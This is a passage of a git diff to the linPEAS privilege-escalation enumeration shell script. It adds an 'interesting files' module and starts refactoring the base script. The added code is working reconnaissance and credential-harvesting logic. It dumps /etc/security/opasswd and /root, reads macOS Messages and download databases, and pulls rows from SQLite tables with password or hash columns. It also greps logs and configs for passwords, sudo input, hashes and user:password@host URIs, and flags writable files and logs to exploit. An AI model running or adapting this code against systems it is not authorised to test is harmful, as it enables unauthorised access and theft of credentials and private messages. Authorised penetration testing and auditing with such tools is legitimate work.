echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" + echo "" +fi + +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found + echo "" +fi + +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi + fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" + echo "" + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ]; then + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + done + echo "" + fi + fi + done +fi +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi + +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" + +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" + +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" + +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + echo "" +fi + +##-- IF) Interesting writable files by group +if ! [ "$IAMROOT" ]; then + print_2title "Interesting GROUP writable files (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$iwfbg" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi + done + done + echo "" +fi + +##-- IF) Passwords in config PHP files +print_2title "Searching passwords in config PHP files" +printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done +echo "" + +##-- IF) TTY passwords +print_2title "Checking for TTY (sudo/su) passwords in audit logs" +aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" +find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" +echo "" + +##-- IF) IPs inside logs +print_2title "Finding IPs inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 +echo "" + +##-- IF) Passwords inside logs +print_2title "Finding passwords inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," +echo "" + +##-- IF) Emails inside logs +print_2title "Finding emails inside logs (limit 70)" +(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" +echo "" + +##-- IF) Passwords files in home +print_2title "Finding *password* or *credential* files in home (limit 70)" +(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found +echo "" + +if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Find possible files with passwords + print_2title "Finding passwords inside key folders (limit 70) - only PHP files" + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) + printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + print_2title "Finding passwords inside key folders (limit 70) - no PHP files" + printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" + echo "" + + ##-- IF) Find possible files with passwords + print_2title "Finding possible password variables inside key folders (limit 140)" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" + echo "" + + ##-- IF) Find possible conf files with passwords + print_2title "Finding possible password in config files" + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) + printf "%s\n" "$ppicf" | while read f; do + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" + fi + done + echo "" + + ##-- IF) Find possible files with usernames + print_2title "Finding 'username' string inside key folders (limit 70)" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + echo "" + + ##-- IF) Specific hashes inside files + print_2title "Searching specific hashes inside files - less false positives (limit 70)" + regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' + regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' + regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' + regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' + regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' + regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' + regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' + regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then + ##-- IF) Specific hashes inside files + print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" + regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' + regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' + regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' + regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + echo "" +fi + +if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then + ##-- IF) Find URIs with user:password@hoststrings + print_2title "Finding URIs with user:password@host inside key folders" + timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_base.sh b/linPEAS/builder/linpeas_parts/linpeas_base.sh similarity index 56% rename from linPEAS/builder/linpeas_base.sh rename to linPEAS/builder/linpeas_parts/linpeas_base.sh index 06abb7d..df6fc85 100755 --- a/linPEAS/builder/linpeas_base.sh +++ b/linPEAS/builder/linpeas_parts/linpeas_base.sh @@ -56,7 +56,7 @@ NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="peass{CHECKS}" WAIT="" PASSWORD="" NOCOLOR="" @@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (peass{CHECKS}). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -1100,2326 +1100,13 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" 